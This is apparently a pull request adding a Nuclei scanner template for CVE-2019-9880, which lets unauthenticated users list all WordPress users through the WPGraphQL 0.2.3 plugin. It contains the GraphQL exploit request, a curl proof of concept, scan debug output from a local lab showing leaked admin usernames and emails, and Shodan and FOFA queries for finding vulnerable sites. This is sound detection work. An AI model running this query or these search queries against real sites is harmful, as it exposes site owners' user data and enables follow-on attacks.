### PR TITLE
ADD CVE-2019-9880 (vKEV)

### DIFF
--- a/http/cves/2019/CVE-2019-9880.yaml
+++ b/http/cves/2019/CVE-2019-9880.yaml
@@ -29,6 +29,7 @@ info:
     vendor: wpengine
     product: wpgraphql
     framework: wordpress
+    shodan-query: http.component:"wordpress" "/wp-content/plugins/wp-graphql/"
     fofa-query: body="/wp-content/plugins/wp-graphql/"
     publicwww-query: "/wp-content/plugins/wp-graphql/"
   tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak

--- a/http/cves/2019/CVE-2019-9880.yaml
+++ b/http/cves/2019/CVE-2019-9880.yaml
@@ -5,17 +5,15 @@ info:
   author: intelligent-ears
   severity: critical
   description: |
-    An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible for an unauthenticated attacker to retrieve all WordPress user details such as email address, role, and username.
+    An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible, for an unauthenticated attacker, to retrieve all WordPress users details such as email address, role, and username.
   impact: |
     An attacker can exploit this vulnerability to enumerate all WordPress users and extract sensitive information including email addresses, usernames, and user roles without authentication.
   remediation: |
     Update WPGraphQL to version 0.3.0 or later to fix this vulnerability.
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9880
     - http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.html
     - https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
     - https://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0
-    - https://wpvulndb.com/vulnerabilities/9282
     - https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
@@ -27,27 +25,16 @@ info:
     cpe: cpe:2.3:a:wpengine:wpgraphql:0.2.3:*:*:*:*:wordpress:*:*
   metadata:
     verified: true
-    max-request: 2
+    max-request: 1
     vendor: wpengine
     product: wpgraphql
     framework: wordpress
-    shodan-query: http.title:"WordPress" "graphql"
     fofa-query: body="/wp-content/plugins/wp-graphql/"
     publicwww-query: "/wp-content/plugins/wp-graphql/"
-  tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,disclosure,kev
-
-variables:
-  client_id: "{{to_lower(rand_text_alpha(8))}}"
+  tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak
 
 http:
   - raw:
-      - |
-        POST /?graphql HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-
-        {"query": "query { users { nodes { id name email username roles } } }"}
-
       - |
         POST /graphql HTTP/1.1
         Host: {{Hostname}}
@@ -58,18 +45,12 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - status_code == 200
+          - contains_all(body, "{\"data\":{", "\"name\":", "\"roles\":")
           - contains(content_type, "application/json")
-          - contains_all(body, "data", "users", "nodes")
-          - contains_any(body, "@", ".com", "administrator", "editor", "author")
-          - "!contains(body, 'errors')"
-          - "!contains(body, 'honeypot')"
+          - status_code == 200
         condition: and
-
     extractors:
       - type: json
         name: user-data
         json:
-          - '.data.users.nodes[].username'
-          - '.data.users.nodes[].email'
-          - '.data.users.nodes[].name'
+          - '.data.users.nodes[] | "username: " + .username + ", email: " + .email'

--- a/http/cves/2019/CVE-2019-9880.yaml
+++ b/http/cves/2019/CVE-2019-9880.yaml
@@ -45,14 +45,14 @@ http:
         POST /?graphql HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
-        
+
         {"query": "query { users { nodes { id name email username roles } } }"}
-      
+
       - |
         POST /graphql HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
-        
+
         {"query": "query { users { nodes { id name email username roles } } }"}
 
     matchers:

--- a/http/cves/2019/CVE-2019-9880.yaml
+++ b/http/cves/2019/CVE-2019-9880.yaml
@@ -1,0 +1,75 @@
+id: CVE-2019-9880
+
+info:
+  name: WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure
+  author: intelligent-ears
+  severity: critical
+  description: |
+    An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible for an unauthenticated attacker to retrieve all WordPress user details such as email address, role, and username.
+  impact: |
+    An attacker can exploit this vulnerability to enumerate all WordPress users and extract sensitive information including email addresses, usernames, and user roles without authentication.
+  remediation: |
+    Update WPGraphQL to version 0.3.0 or later to fix this vulnerability.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9880
+    - http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.html
+    - https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
+    - https://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0
+    - https://wpvulndb.com/vulnerabilities/9282
+    - https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2019-9880
+    cwe-id: CWE-306
+    epss-score: 0.187
+    epss-percentile: 0.92847
+    cpe: cpe:2.3:a:wpengine:wpgraphql:0.2.3:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: wpengine
+    product: wpgraphql
+    framework: wordpress
+    shodan-query: http.title:"WordPress" "graphql"
+    fofa-query: body="/wp-content/plugins/wp-graphql/"
+    publicwww-query: "/wp-content/plugins/wp-graphql/"
+  tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,disclosure,kev
+
+variables:
+  client_id: "{{to_lower(rand_text_alpha(8))}}"
+
+http:
+  - raw:
+      - |
+        POST /?graphql HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        
+        {"query": "query { users { nodes { id name email username roles } } }"}
+      
+      - |
+        POST /graphql HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        
+        {"query": "query { users { nodes { id name email username roles } } }"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(content_type, "application/json")
+          - contains_all(body, "data", "users", "nodes")
+          - contains_any(body, "@", ".com", "administrator", "editor", "author")
+          - "!contains(body, 'errors')"
+          - "!contains(body, 'honeypot')"
+        condition: and
+
+    extractors:
+      - type: json
+        name: user-data
+        json:
+          - '.data.users.nodes[].username'
+          - '.data.users.nodes[].email'
+          - '.data.users.nodes[].name'

--- a/http/cves/2019/CVE-2019-9880.yaml
+++ b/http/cves/2019/CVE-2019-9880.yaml
@@ -29,7 +29,6 @@ info:
     vendor: wpengine
     product: wpgraphql
     framework: wordpress
-    shodan-query: http.component:"wordpress" "/wp-content/plugins/wp-graphql/"
     fofa-query: body="/wp-content/plugins/wp-graphql/"
     publicwww-query: "/wp-content/plugins/wp-graphql/"
   tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak
@@ -50,6 +49,7 @@ http:
           - contains(content_type, "application/json")
           - status_code == 200
         condition: and
+
     extractors:
       - type: json
         name: user-data


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2019-9880 - WPGraphQL 0.2.3 Unauthenticated User Information Disclosure
- References:
   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9880
   - http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.html
   - https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
   - https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/

### Template Validation

I've validated this template locally
- [x] YES
- [ ] NO

- Here's the exploit I ran locally
```bash
┌──(kali㉿kali)-[~/Desktop/wplab]
└─$ curl -X POST http://localhost:8000/?graphql \
  -H "Content-Type: application/json" \
  -d '{"query": "query { users { nodes { id name email username roles } } }"}'
{"data":{"users":{"nodes":[{"id":"dXNlcjox","name":"admin","email":"intelears@test.com","username":"admin","roles":["administrator"]}]}}}
```
- Here's the Nuclei Debug:
```bash
┌──(kali㉿kali)-[~/…/nuclei-templates/http/cves/2019]
└─$ nuclei -u http://localhost:8000 -t CVE-2019-9880.yaml -debug   

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.6

		projectdiscovery.io

[INF] Current nuclei version: v3.4.6 (outdated)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2019-9880] Dumped HTTP request for http://localhost:8000/?graphql

POST /?graphql HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.1
Connection: close
Content-Length: 71
Content-Type: application/json
Accept-Encoding: gzip

{"query": "query { users { nodes { id name email username roles } } }"}
[DBG] [CVE-2019-9880] Dumped HTTP response http://localhost:8000/?graphql

HTTP/1.1 200 OK
Connection: close
Content-Length: 138
Access-Control-Allow-Headers: Authorization, Content-Type
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 600
Content-Type: application/json; charset=UTF-8
Date: Tue, 16 Sep 2025 22:15:28 GMT
Server: Apache/2.4.25 (Debian)
X-Content-Type-Options: nosniff
X-Hacker: If you're reading this, you should visit github.com/wp-graphql and contribute!
X-Powered-By: PHP/7.2.18
X-Robots-Tag: noindex

{"data":{"users":{"nodes":[{"id":"dXNlcjox","name":"admin","email":"intelears@gmail.com","username":"admin","roles":["administrator"]}]}}}
[CVE-2019-9880:dsl-1] [http] [critical] http://localhost:8000/?graphql ["admin","intelears@gmail.com"]
[INF] [CVE-2019-9880] Dumped HTTP request for http://localhost:8000/graphql

POST /graphql HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/104.0 Safari/537.36
Connection: close
Content-Length: 71
Content-Type: application/json
Accept-Encoding: gzip

{"query": "query { users { nodes { id name email username roles } } }"}
[DBG] [CVE-2019-9880] Dumped HTTP response http://localhost:8000/graphql

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 282
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 16 Sep 2025 22:15:28 GMT
Server: Apache/2.4.25 (Debian)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /graphql was not found on this server.</p>
<hr>
<address>Apache/2.4.25 (Debian) Server at localhost Port 8000</address>
</body></html>
[INF] Scan completed in 52.670946ms. 1 matches found.
```
### Additional Details 
- Vulnerability Type: Authentication bypass leading to information disclosure
- Attack Vector: GraphQL query to enumerate WordPress users without authentication
- Affected Versions: WPGraphQL plugin version 0.2.3 and earlier
- WordPress Setup Requirements:

### SetUp Details
- WordPress installation with WPGraphQL plugin version 0.2.3 or earlier
- No authentication required - this is an unauthenticated vulnerability
- GraphQL endpoint accessible at /?graphql or /graphql

### Query details:
- ``` query { users { nodes { id name email username roles } } } ```
- FOFA Query: ``` body="/wp-content/plugins/wp-graphql/" ```
- Shodan Query: ``` http.title:"WordPress" "graphql" ```
- PublicWWW Query: ``` "/wp-content/plugins/wp-graphql/" ```

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)